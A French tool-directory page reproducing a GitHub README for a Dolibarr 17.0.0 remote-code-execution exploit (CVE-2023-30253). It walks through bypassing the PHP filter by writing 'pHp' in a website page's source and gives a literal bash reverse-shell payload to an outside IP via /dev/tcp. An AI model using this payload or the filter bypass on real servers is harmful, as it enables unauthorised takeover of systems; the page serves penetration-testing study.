Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Dolibarr-17.0.0-Exploit-CVE-2023-30253 — Dans Dolibarr 17.0.0 avec le plugin CMS Website (core) activé, un attaquant authentifié peut obtenir une exécution de commande à distance via une injection de code PHP contournant les restrictions de l'application. | Kitploit
Outils/GitHubGitHub/dollarboysushil/dolibarr-17.0.0-exploit-cve-2023-30253
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubdollarboysushil/dolibarr-17.0.0-exploit-cve-2023-30253

Dolibarr-17.0.0-Exploit-CVE-2023-30253

Dans Dolibarr 17.0.0 avec le plugin CMS Website (core) activé, un attaquant authentifié peut obtenir une exécution de commande à distance via une injection de code PHP contournant les restrictions de l'application.

Voir le dépôt
931il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Readme.md

CVE-2023-30253

CVE-2023-30253 est une faille de sécurité dans le logiciel Dolibarr qui permet aux utilisateurs authentifiés d'exécuter du code à distance en utilisant une technique de manipulation de majuscules dans les données injectées.

Impact

Cette vulnérabilité peut entraîner une exécution de code à distance non autorisée par des acteurs malveillants, constituant une menace sérieuse pour la sécurité et l'intégrité des systèmes concernés. La vulnérabilité a été corrigée dans Dolibarr 17.0.1.

Référence

https://www.swascan.com/security-advisory-dolibarr-17-0-0/

https://github.com/Dolibarr/dolibarr


Preuve de concept

La POC suivante montre comment obtenir un Reverse Shell manuellement.

Untitled.png

Après connexion en tant qu'utilisateur de test, nous pouvons créer/modifier le site web.

Untitled (1).png

Créez d'abord un site web, puis créez une page.

Untitled (2).png

Untitled

Après avoir créé le site web et la page, cliquez sur l'icône des jumelles, cela ouvrira notre page créée dans un nouvel onglet.

Maintenant, cliquez sur Modifier la source HTML.

Untitled (4).png

Ici, nous pouvons essayer d'ajouter du code PHP, mais il y a une sorte de filtre qui nous empêche d'écrire du code PHP. Cela peut être facilement contourné en modifiant le format du mot php.

Untitled (5).png

Après avoir changé le format du mot php en pHp, nous pouvons voir qu'il est sauvegardé avec succès.

Untitled (6).png

En allant sur la page, nous pouvons voir que notre code PHP inséré fonctionne.

Maintenant, pour obtenir un Reverse Shell, configurons un listener netcat.

Untitled (7).png

Untitled (8).png

Ensuite, ajoutons notre code de Reverse Shell <?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.101/1010 0>&1'"); ?>

Maintenant, ouvrir le site web nous donne un Reverse Shell.

Untitled (9).png




Nous pouvons utiliser le code Python pour simplifier le processus.

Untitled

Configurez un listener netcat.

Untitled

Exécutez le script et nous devrions obtenir un Reverse Shell.

Untitled

Auteur du script : https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

Télécharger l’outil